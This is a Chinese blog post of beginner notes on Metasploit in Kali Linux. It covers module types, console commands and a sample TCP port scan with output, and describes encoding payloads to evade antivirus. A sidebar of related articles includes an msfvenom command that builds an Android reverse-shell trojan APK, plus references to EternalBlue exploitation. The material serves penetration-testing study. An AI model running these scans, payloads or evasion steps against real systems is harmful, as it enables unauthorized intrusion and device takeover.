kali之Metasploit(笔记)

最新推荐文章于 2024-07-13 20:05:45 发布
最新推荐文章于 2024-07-13 20:05:45 发布
阅读量445 收藏
点赞数
分类专栏: kali linux 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/108252868
版权

Metasploit简介

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

开启数据库:service postgresql strt
启动:msfconsole
初始化msf数据库:msfdb init
查看数据库连接状态:db_status

Metasploit基础

  • 专业术语
    msf框架由多个模块组成,各个模块及其具体的功能如下:
    Auxiliaries(辅助模块)
    该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试
    Exploit(漏洞利用模块)
    漏洞利用是指由渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为
    Payload(攻击载荷模块)
    攻击载荷是我们期望目标系统在被渗透攻击之后完成实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任意命令或者执行特定代码,在msf框架中可以自由地选择、传送和植入如添加用户等
    Post(后期渗透模块)
    主要用于在取得目标系统远程控制权后,进行一系统的后渗透攻击动作,如获取敏感信息、实施跳板攻击等
    Encoders(编码工具模块)
    负责免杀,以防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来
  • 渗透攻击步骤
使用msf渗透测试时,可以综合使用以上模块,对目标系统进行侦察并发动攻击,步骤如下:
1.扫描目标系统,寻找可用漏洞
2.选择并配置一个漏洞利用模块
3.选择并配置一个攻击载荷模块
4.选择一个编码技术,用来绕过杀毒软件的查杀
5.渗透攻击

Metasploit指令

help/?         帮助
exit           退出msf
Back           返回
info           显示一个或者多个模块的信息
show           显示所给类型的模块
background     将当前操作在后台运行
use            选择使用模块
sessions       查看会话

简单的渗透攻击

主机扫描
扫描和收集信息是渗透测试中的第一步,其主要目标是尽可能多地发现有关目标机器的信息,获取的信息越多,渗透的概率就越大,主要关注目标机器IP地址、可用服务、开放端口等。

  • 使用辅助模块进行端口扫描
    辅助模块是msf的内置模块,首先利用search命令搜索有哪些可用端口模块
msf5 > search portscan
Matching Modules
================
   #  Name                                              Disclosure Date  Rank    Check  Description
 -  ----                                              ---------------  ----    -----  -----------
   1  auxiliary/scanner/http/wordpress_pingback_access                   normal  Yes    Wordpress Pingback Locator
   2  auxiliary/scanner/natpmp/natpmp_portscan                           normal  Yes    NAT-PMP External Port Scanner
   3  auxiliary/scanner/portscan/ack                                     normal  Yes    TCP ACK Firewall Scanner
   4  auxiliary/scanner/portscan/ftpbounce                               normal  Yes    FTP Bounce Port Scanner
   5  auxiliary/scanner/portscan/syn                                     normal  Yes    TCP SYN Port Scanner
   6  auxiliary/scanner/portscan/tcp                                     normal  Yes    TCP Port Scanner
   7  auxiliary/scanner/portscan/xmas                                    normal  Yes    TCP "XMas" Port Scanner
   8  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner

可以看到可用的扫描器列表,其中包含了各种扫描类型。
输入use命令即可使用该漏洞利用模块,使用show options命令查看需要设置的参数

msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

在Required列中,被标记为yes的参数必须包含实际的值,其中RHOSTS设置代扫描的IP地址、PORTS设置扫描端口范围、THREADS设置扫描线程,线程数量越高,扫描的速度越快,可以使用set命令设置相应的参数,也可以适应unset命令取消某个参数值的设置,然后我们run运行

msf5 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.1.100:        - 192.168.1.100:139 - TCP OPEN
[+] 192.168.1.100:        - 192.168.1.100:135 - TCP OPEN
[+] 192.168.1.100:        - 192.168.1.100:445 - TCP OPEN
[+] 192.168.1.100:        - 192.168.1.100:1025 - TCP OPEN
[*] 192.168.1.100:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

可以看到开放了135、139、445、1025端口

  • 使用辅助模块进行服务扫描
    在扫描目标上运行的服务时,有多种基于服务的扫描技术可供选择,例如VNC、FTP、SMB等,只需执行特定类型的扫描就可以发现服务,通过search命令搜索scanner可以发现大量的扫描模块,可以多尝试,了解其用法
    常用的扫描模块及其功能

小知识

setg和unsetg命令,二者用于在msf中设置或者取消设置全局性的参数值,从而避免重复输入相同的值
p_utao
关注
专栏目录
Kali Linux 漏洞利用工具集 metasploit 教程
Sumarua的博客
07-27 2748
文章目录Kali Linux 漏洞利用工具集 metasploit 教程理解基本概念和术语metasploit 命令用法:核心命令模块命令工作命令资源脚本命令数据库后端命令凭证后端命令Metasploit效果与评价: Kali Linux 漏洞利用工具集 metasploit 教程 Metasploit Pro是一个开发和漏洞验证工具,可帮助您将渗透测试工作流划分为更小,更易管理的任务。借助Metasploit Pro,您可以通过基于Web的用户界面利用Metasploit Framework及其利用数据库
常见端口
3条鱼 的命名空间
07-13 1138
在上网的时候,我们经常会看到“端口”这个词,也会经常用到端口号,比如在FTP地址后面增加的“21”,21就表示端口号。那么端口到底是什么意思呢?怎样查看端口号呢?一个端口是否成为网络恶意攻击的大门呢?,我们应该如何面对形形色色的端口呢?下面就将介绍这方面的内容,以供大家参考。  21端口:21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务。  端口
kali使用Metasploit进行渗透攻击
lhf13036943631的博客
05-06 833
2、载入easyfilesharing_seh渗透模块,查看需要设置的参数并进行设置,启动模块。(2)查找与EasyFileSharing有关的渗透模块。(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)
Kali操作系统上使用metasploit
weixin_55280439的博客
03-29 3649
meterpreter 是强大的后渗透模块,可以输入help 查看帮助信息,远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统.......这些看起来非常复杂又高级的操作都能用meterpreter 中的一行或几个字母,简单的命令完成。[*Payload 是攻击载荷,就是攻击完成后想获取的东西,这里是想获取 meterpreter](注:显示攻击失败表示目标主机上没有此漏洞,此漏洞只适用于攻击自己的win7靶机,高版本的系统已经修复此漏洞,显示WIN 表示攻击成功,其他则是失败)
【MSF】Kali最强渗透工具之Metasploit_kali metasploit
m0_57541068的博客
04-16 1108
此处遇到了一个小小问题:出现kali机和windows机连在同一网段,windows机能ping通kali机,而kali机无法ping通Windows的情况,最后通过关闭windows防火墙解决了问题。永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
kali——勒索病毒metasploit
weixin_64033212的博客
04-22 895
它会向目标网络中的每个 IP 地址发送 ICMP echo 请求包,以查看哪些主机是活跃的(即在线)。这个命令不会进行端口扫描,只关注于发现哪些 IP 地址对应的主机是响应 ICMP 请求的。的一个主机发现技术,它使用 ICMP echo 请求和 TCP ACK 包来探测主机。参数本身是一个快速的方式来确定哪些主机是活跃的,但它默认使用 ICMP echo 请求和 TCP SYN 包来探测主机。命令会执行一个仅主机发现的扫描,使用 ICMP echo 请求和 TCP ACK 包来探测网络中的活跃主机。
Kali-linux使用Metasploit基础
2301_77162959的博客
05-16 1025
Metasploit是一款开源的安全漏洞检测工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,提供真正的安全风险情报。当用户第一次接触Metasploit渗透测试框架软件(MSF)时,可能会被它提供如此多的接口、选项、变量和模块所震撼,而感觉无所适从。Metasploit软件为它的基础功能提供了多个用户接口,包括终端、命令行和图形化界面等。本节将介绍Metasploit下各种接口的使用方法。
2024年最新【MSF】Kali最强渗透工具之Metasploit_kali metasploit(2),网络安全面试选择题
2401_84267735的博客
05-06 646
此处遇到了一个小小问题:出现kali机和windows机连在同一网段,windows机能ping通kali机,而kali机无法ping通Windows的情况,最后通过关闭windows防火墙解决了问题。学到这报一丝,还是没能成功,渗透攻击有可能成功也有可能失败,漏洞在不断修复之中,对于我这个刚开始学渗透的小白来说真是路漫漫其修远兮啊~此处安装的是windows7 64x虚拟机,使之与kali虚拟机在同一网段中,即两台虚拟机能够互相ping通。程,涵盖了95%以上网络安全知识点,真正体系化!
信息系统安全——基于 KALIMetasploit 的渗透测试
zz12345600354的博客
04-25 583
实验 2 基于 KALIMetasploit 的渗透测试2.1 实验名称《基于 KALIMetasploit 的渗透测试》2.2 实验目的1 、熟悉渗透测试方法2 、熟悉渗透测试工具 KaliMetasploit 的使用2.3 实验步骤及内容**** 、安装系统**** 、选择**** 中种攻击工具,记录攻击的主要步骤和攻击结果截图。攻击一:使用复现“永恒之蓝”漏洞实验环境:Win7(关闭防火墙,开启 SMB 服务);1 启动 Metasploit
Metasploit学习笔记
weixin_44854561的博客
10-27 355
个人学习——Metasploit学习笔记1 认识metasploit #Meatsploit渗透测试指南学习笔记# 学习目标:认识Metasploit工具 学习内容: 1、 初识渗透测试技术 2、 初始metasploit 3、 学习metasploit基础 1.初识渗透测试 渗透测试(Penetration Testing)是一种通过模拟攻击者的技术与方法,挫败目标系统的安全控制措施并且取得访问控制权的安全测试方式。 PTES将渗透测试过程分为七个阶段: 1.1 前期交互阶段 该阶段通常由渗透测试人
kali的学习笔记篇(六)metasploit之安卓后门
Kind&红衣的博客
08-12 3541
环境: kali-linux-2018.-2-amd-64.iso android 支持外网监听 0x01: //生成安卓木马: msfvenom -p android/meterpreter/reverse_tcp LHOST=[myIP] LPORT=55555 R > [akpNAME].apk 0x02: //加载攻击模块 use exploit/m...
【MSF】Kali最强渗透工具之Metasploit
zou09241314的博客
10-23 1203
类似于msf有一个神奇的魔法,能让复杂的漏洞攻击的流程变得非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
Kali Metasploit工具简介
董哥的黑板报
07-24 4972
一、Metasploit的历史 在没有漏洞渗透工具框架的时候,渗透测试者往往需要自己收集漏洞渗透用代码,甚至自己编写针对漏洞用的代码,这个时期的渗透测试效率比较低 2003年左右,美国的H.D Moore和Spoonm创建了一个继承了多个漏洞渗透工具的框架。随后,这个框架在2004年的世界黑客交流会(Black Hat Briefings)上备受关注,Spoonm在大会的演讲中提到,Metas...
Kali使用Metasploit内、外网渗透windows系统
热门推荐
QQ670663的博客
02-17 2万+
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。 一、(内网渗透)内网英文缩写WAN;内网又称局域网 局域网的覆盖范围一般是方圆几千米之内,其具备的安装便捷、成本节约、扩展方便等特点使其在各类办公室内运用广泛。局域网可以实现文件管理、应用软件共享、打印机共享等功能,在使用过程当中,通过维护局域网网...
Kalimetasploit渗透Windows7
如诗如画
06-16 3118
Kalimetasploit渗透Windows7/教程详细/ 靶场环境 操作系统 Kali_Linux IP:172.17.201.44 靶机 windows7 IP:172.17.201.12 使用工具 metasploit nmap 正文 1.首先使用namp对靶机进行扫描,确定445端口是否开启 2.打开metasploit搜索ms17-010 1. msfconsole 2. search ms17-010 3.选择漏洞验证扫描工具并设置参数 1. use auxiliary/ad
Kali虚拟机中Metaspolit的学习和应用
最新发布
Time_worm的博客
07-13 813
以上部分只是入门Metasploit的基础知识,想要真正学会使用,还要结合具体实例,比如各种漏洞的复现来学习。
Kali渗透测试:使用工具Metasploit攻击操作系统
Liu_Bruce的博客
05-12 6984
Kali渗透测试:使用工具Metasploit攻击操作系统 如果在目标系统上发现了漏洞之后,接下来就是要利用漏洞渗透工具对目标系统进行攻击。Metasploit是目前非常优秀的一款漏洞渗透工具。 1.1 Metasploit基础 2003年左右,H.D Moore和Spoonm 创建了一个集成了多个漏洞渗透工具的框架。随后, 这个框架在2004年的Black Hat Briefings 会议上备受关注,Spoonm在大会的演讲中提到,Metasploit的使用非常简单,以至于你只需要找到一个目标,多次单击鼠
肥肠恐布--探索Kali Linux中的Metasploit Framework(MSF听说肾透大佬经常用)
weixin_51030879的博客
07-10 769
Metasploit Framework(MSF)是一款功能强大的漏洞利用工具,广泛用于网络渗透测试和安全评估。在Kali Linux中,Metasploit是一个集成的框架,为安全研究人员提供了一套丰富的工具和资源,以便于发现和利用系统中的漏洞。本篇博客将带您了解Metasploit的基本原理和使用方法。一、Metasploit Framework是一款开源的渗透测试和漏洞利用框架,由Rapid7开发和维护。它提供了一套功能强大的工具和资源,帮助安全研究人员评估和验证系统的安全性。
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 5038
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
kali安装metasploit
06-06
要在Kali Linux上安装Metasploit,您可以按照以下步骤进行操作: 1. 打开终端并更新Kali Linux的软件包: ``` sudo apt-get update sudo apt-get upgrade ``` 2. 安装依赖项: ``` sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev ``` 3. 安装Ruby: ``` sudo apt-get install ruby-full ``` 4. 克隆Metasploit存储库: ``` cd /opt sudo git clone https://github.com/rapid7/metasploit-framework.git ``` 5. 安装bundler: ``` sudo gem install bundler ``` 6. 安装依赖项: ``` cd metasploit-framework sudo bundle install ``` 7. 运行msfconsole: ``` sudo ./msfconsole ``` 现在,您已经成功安装了Metasploit
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值